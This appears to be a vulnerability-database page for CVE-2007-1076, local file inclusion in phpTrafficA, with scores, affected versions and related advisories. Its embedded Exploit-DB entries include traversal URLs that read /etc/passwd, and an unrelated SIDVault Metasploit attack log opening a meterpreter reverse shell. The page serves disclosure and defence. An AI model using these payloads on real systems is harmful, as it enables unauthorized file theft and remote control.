CVE-2007-1076
published 2007-02-22CVE-2007-1076: Multiple directory traversal vulnerabilities in phpTrafficA 1.4.1, and possibly earlier, allow remote attackers to include arbitrary local files via a .. (dot…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
4.05%
89.4th percentile
Multiple directory traversal vulnerabilities in phpTrafficA 1.4.1, and possibly earlier, allow remote attackers to include arbitrary local files via a .. (dot dot) in the (1) file parameter to plotStat.php and the (2) lang parameter to banref.php.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phptraffica | phptraffica | — | — |
| zoneo-soft | phptraffica | <= 1.4.2 | — |
| zoneo-soft | phptraffica | <= 1.4 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9r86-m2fw-8wr3: Multiple unspecified vulnerabilities in phpTrafficA before 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3428 [HIGH] GHSA-9r86-m2fw-8wr3: Multiple unspecified vulnerabilities in phpTrafficA before 1
Multiple unspecified vulnerabilities in phpTrafficA before 1.4.2 allow remote attackers to have an unknown impact via the file parameter to (1) plotStatBar.php or (2) plotStatPie.php, different vectors than CVE-2007-1076.
GHSA
GHSA-mx67-p696-pxj5: Directory traversal vulnerability in index
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3425 [HIGH] GHSA-mx67-p696-pxj5: Directory traversal vulnerability in index
Directory traversal vulnerability in index.php in phpTrafficA 1.4.2 and earlier allows remote attackers to include arbitrary local files via the lang parameter, a different vector and version than CVE-2007-1076.2.
GHSA
GHSA-42xf-g5pp-5x9x: Multiple directory traversal vulnerabilities in phpTrafficA 1
ghsa_unreviewed·2022-05-01
CVE-2007-1076 [HIGH] CWE-22 GHSA-42xf-g5pp-5x9x: Multiple directory traversal vulnerabilities in phpTrafficA 1
Multiple directory traversal vulnerabilities in phpTrafficA 1.4.1, and possibly earlier, allow remote attackers to include arbitrary local files via a .. (dot dot) in the (1) file parameter to plotStat.php and the (2) lang parameter to banref.php.
No detection rules found.
Exploit-DB
SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
exploitdb·2009-09-04
CVE-2007-4566 SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
---
#--attack-log--
#attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$ ./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E
#[*] Please wait while we load the module tree...
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Sending stage (718336 bytes)
#[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076)
#meterpreter >
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metaspl
Exploit-DB
phpTrafficA 1.4.1 - 'banref.php?lang' Traversal Local File Inclusion
exploitdb·2007-02-21
CVE-2007-1076 phpTrafficA 1.4.1 - 'banref.php?lang' Traversal Local File Inclusion
phpTrafficA 1.4.1 - 'banref.php?lang' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/22655/info
phpTrafficA is prone to multiple directory-traversal vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid the attacker in further attacks.
phpTrafficA version 1.4.1 is vulnerable to these issues.
http://www.example.com/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00
Exploit-DB
phpTrafficA 1.4.1 - 'plotStat.php?File' Traversal Local File Inclusion
exploitdb·2007-02-21
CVE-2007-1076 phpTrafficA 1.4.1 - 'plotStat.php?File' Traversal Local File Inclusion
phpTrafficA 1.4.1 - 'plotStat.php?File' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/22655/info
phpTrafficA is prone to multiple directory-traversal vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid the attacker in further attacks.
phpTrafficA version 1.4.1 is vulnerable to these issues.
http://www.example.com/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2007-February/001377.htmlhttp://osvdb.org/33373http://osvdb.org/33374http://secunia.com/advisories/24242http://soft.zoneo.net/phpTrafficA/news.phphttp://www.bugtraq.ir/articles/file-inclusion/phpTrafficA-1.4.1-Local-File-Inclusion/1http://www.securityfocus.com/bid/22655http://www.vupen.com/english/advisories/2007/0709https://exchange.xforce.ibmcloud.com/vulnerabilities/32628http://attrition.org/pipermail/vim/2007-February/001377.htmlhttp://osvdb.org/33373http://osvdb.org/33374http://secunia.com/advisories/24242http://soft.zoneo.net/phpTrafficA/news.phphttp://www.bugtraq.ir/articles/file-inclusion/phpTrafficA-1.4.1-Local-File-Inclusion/1http://www.securityfocus.com/bid/22655http://www.vupen.com/english/advisories/2007/0709https://exchange.xforce.ibmcloud.com/vulnerabilities/32628
2007-02-22
Published